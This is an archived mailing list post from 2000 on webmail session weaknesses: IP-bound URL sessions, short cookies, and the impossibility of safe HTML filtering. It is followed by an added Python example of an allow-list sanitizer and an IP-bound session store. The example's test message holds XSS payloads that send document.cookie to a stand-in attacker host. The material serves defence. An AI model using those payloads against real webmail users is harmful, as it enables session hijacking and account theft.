Vulnerability Development mailing list archives

Re: Netaddress and amexmail


From: marcs () ZNEP COM (Marc Slemko)
Date: Sat, 29 Apr 2000 00:08:37 -0600


On Thu, 27 Apr 2000, Blue Boar wrote:

> Fabio Pietrosanti wrote:
>
> > Do you know about the existence of cookies? :)
>
> I think that's the answer in this case.
>
> Though, the question is valid.  There do exist web services
> that put everything needed in the URL, so saving the URL
> will work.  Some also have a timeout, so the same URL no longer
> works 5 minutes later, which could explain a friend not
> being able to use the URL because time has passed.
>
> Those are really dumb, especially for web e-mail.  If someone
> mails you a link, and you click on it, guess what shows up
> in the site's log as a referer...

In this case, if you look at the options given at login you see that
netaddress gives you the choice of using cookies or not.

By default, they don't.  That has a few implications.  First, anyone who
can access the service from the same IP address that you can is able to do
nasty things.  Suppose you use a proxy with world (i.e. to anyone with
access to that machine) readable logs.  You are toast against anyone who
can read them and use the proxy machine.  Anyone behind one of those evil
bogus "transparent caching" so-called HTTP proxies has the problem of
"sharing" an IP too.

Second, this assumption doesn't always work right because you can't make
the assumption that one IP address == one user.  And that works both ways;
one IP address could be more than one user, one user could have more than
one IP during the same session, or both.

After you logout or after a timeout, the session is no longer valid.

If you use cookies, then the IP address limitation is no longer there.
The cookie they use is a 6-character alphabetic key.  However, that is
still not very secure due to so-called "cross site scripting" (although in
this case it is a lot more straightforward; mail someone something that
gets them to send you their cookie, no "cross site" anything).  Cookies
are not secure and will never be secure.  Period.  I can guarantee you
that with almost any web-based mail service, someone can steal your cookies
for that service.  Netaddress is no exception.  Trying to display
arbitrary HTML while filtering "unsafe" HTML is really an unsolved, and
unsolvable, task.  The only way a service can avoid this is by only
explicitly allowing through a very limited subset of HTML.  This limits
functionality quite a bit, but there is no choice if security is a goal.
The very fact that Hotmail still has new problems being found every month
or so should demonstrate this; if MS can't get it right for IE, no one
else has much chance.  Hotmail is even worse though, due to its use of
Microsoft's passport system.

For Netaddress, you are probably safer, in most situations, not using
their cookie option, since it significantly decreases security for most
people.

For most people, the best of both worlds would be cookies combined with an
IP address restriction.  Not 100%, but stops any random user from
exploiting you.  Unfortunately, very few, if any, services offer that.

The other thing that webmail services should do, if they don't want to do it
by default, is give you the option of having it set to "strict HTML filtering".
That way maybe some things won't work, but you are a lot more secure.
They could then include a "read this insecurely" link if you really think
you want to read a message without stripping/encoding any non-trivial
HTML.  This should be the default setting, but even if they don't make it
the default, at least offering it would make life better.

Disabling javascript would be a nice option, but unfortunately most web
based mail services require that you leave it enabled.  Catch-22.
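
The strict allow-list HTML filtering and the cookie-plus-IP-restriction session handling described in the message above, as an added example in Python. This is illustration written for this archive page, not code from Netaddress, Hotmail or any other service; the tag and URL-scheme allow-lists, the 15-minute idle timeout, the `attacker.example` host and the hostile sample message are all assumptions constructed for the demonstration:

```python
# Added illustration, not code from Netaddress or any other service. The tag
# set, URL schemes, timeout and the sample message below are all assumptions.
from html import escape
from html.parser import HTMLParser
import secrets, time

# Only these tags survive; anything else is dropped but its text is kept.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "ul", "ol", "li", "blockquote", "a"}
ALLOWED_ATTRS = {"a": {"href"}}            # no style=, src= or on* handlers
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"http", "https", "mailto"}
DROP_WITH_CONTENT = {"script", "style"}    # the tag AND everything inside it go

def safe_href(value):
    """Absolute http(s)/mailto only: rejects javascript:, data:, vbscript:,
    scheme-relative //host, and schemes hidden behind control characters."""
    if not value:
        return False
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    scheme, sep, _ = cleaned.partition(":")
    return bool(sep) and scheme.lower() in SAFE_SCHEMES

class AllowListSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)   # attrs and text arrive decoded
        self.out, self.stack, self.skip_depth = [], [], 0   # stack keeps output balanced

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = ""
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, ()) and (name != "href" or safe_href(value)):
                kept += f' {name}="{escape(value or "", quote=True)}"'
        self.out.append(f"<{tag}{kept}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.stack:
            return
        while self.stack:                     # close everything opened after `tag`
            top = self.stack.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):              # text is re-encoded on the way out
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()
        while self.stack:
            self.out.append(f"</{self.stack.pop()}>")
        return "".join(self.out)

def sanitize_html(untrusted):
    p = AllowListSanitizer()
    p.feed(untrusted)
    return p.result()

SESSION_TTL = 15 * 60   # idle timeout in seconds (assumed value)

class SessionStore:
    """Cookie + IP binding: a stolen cookie is useless from another address and
    a same-IP neighbour (shared proxy, NAT) still has to guess the cookie."""
    def __init__(self, now=time.time):
        self.now, self.sessions = now, {}

    def create(self, user, ip):
        token = secrets.token_urlsafe(32)     # 256 bits; 6 letters give only 26**6
        self.sessions[token] = {"user": user, "ip": ip, "last": self.now()}
        return token

    def lookup(self, token, ip):
        s = self.sessions.get(token)
        if s is None:
            return None
        if self.now() - s["last"] > SESSION_TTL:
            del self.sessions[token]          # expired: same as a logout
            return None
        if s["ip"] != ip:
            return None                       # wrong address: reject, keep session
        s["last"] = self.now()
        return s["user"]

# Constructed hostile message: each part tries to exfiltrate document.cookie.
EVIL_MAIL = ('<p>Hi!</p>'
    '<script>location="http://attacker.example/?c="+document.cookie</script>'
    '<img src="x" onerror="(new Image).src=\'http://attacker.example/?c=\'+document.cookie">'
    '<a href="javascript:alert(document.cookie)">click me</a>'
    '<a href="&#106;avascript:alert(1)">also me</a>'
    '<a href="http://example.com/" onclick="steal()">legit link</a>'
    '<b>bold <i>nested</b> stray</i>')
```

Self-closing tags such as `<br/>` go through HTMLParser's default `handle_startendtag` (start, then end), and comments, doctypes and processing instructions hit the parser's no-op defaults, so none of them reach the output. `sanitize_html(EVIL_MAIL)` returns `<p>Hi!</p><a>click me</a><a>also me</a><a href="http://example.com/">legit link</a><b>bold <i>nested</i></b> stray`: the script block and the `onerror` image are gone entirely, the `javascript:` links (including the entity-encoded one, which HTMLParser decodes before the filter sees it) keep their text but lose their target, and the unbalanced `<i>` is closed where its parent `<b>` closes. The session store deliberately rejects a wrong-IP lookup without revoking the session, so someone who has already stolen the cookie cannot use it to log the real user out.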

